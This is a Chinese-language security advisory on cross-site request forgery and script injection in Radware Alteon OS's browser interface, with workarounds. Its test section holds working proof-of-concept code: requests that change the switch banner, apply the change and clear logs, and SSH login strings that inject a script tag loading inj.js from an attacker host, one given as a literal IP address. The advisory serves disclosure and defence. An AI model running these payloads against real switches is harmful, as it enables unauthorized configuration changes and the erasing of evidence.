Alteon OS BBI跨站请求伪造和HTML注入漏洞

受影响系统:

radware Alteon OS BBI <= 21.0.8.3

描述:
Alteon OS是Alteon系列交换机所使用的操作系统,其中捆绑了基于浏览器界面(BBI)软件允许用户使用Web浏览器访问交换机信息和统计,或通过Internet进行配置。

如果用户已经通过了认证并获得了交换机的有效会话,则使用BBI访问恶意网页就可能导致跨站请求伪造攻击,允许攻击者非授权执行各种管理操作;此外远程攻击者还可以通过恶意SSH登录参数执行跨站脚本攻击,向日志中注入36个字节的JavaScript代码,当用户查看日志时就会执行这些注入的代码。

<*来源:Sintsov Alexey
  
  链接:
http://marc.info/?l=bugtraq&m=125838654819982&w=2
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html>
<head>

<title>Nortel XSRF</title>
</head>
<body>

<script src="http://<Switch>/switchSystem.html/bar?banner=newBanner</script>
<script src="http://<Switch>/TopToolArea.html?actionState=apply"></script>

</body>
</html>

var request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Change banner
request.open("GET",
"http://<NortelSwitch>/switchSystem.html/bar?banner=thx2Kononenko", false);
request.send(null);

        
request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//apply changes
request.open("GET", "http://<NortelSwitch>/TopToolArea.html?actionState=apply",
false);
request.send(null);

request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Clear log
request.open("GET", "http://<NortelSwitch>/clearLog.html", false);
request.send(null);

alexey@shell#:ssh <NortelSwitch>

login as: <script a="
<script a="@<NortelSwitch>’s password:
Access denied^C

alexey@shell#:ssh <NortelSwitch>

login as: " src="http://<EvilHost>/inj.js" b="
" src="
http://212.24.49.12/inj.js" b=" com2="@<NortelSwitch>s password:
Access denied^C

alexey@shell#:ssh <NortelSwitch>

login as: "></script>
"></script>@<NortelSwitch>’s password:
Access denied^C

建议:

临时解决方法:

* 关闭BBI。
* 更改默认的SSHd端口:

/c/sys/access/https/https d
/c/sys/access/http d
/c/sys/access/sshd/sshport 42

厂商补丁:

radware
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.radwarealteon.com/

发表评论?

0 条评论。

发表评论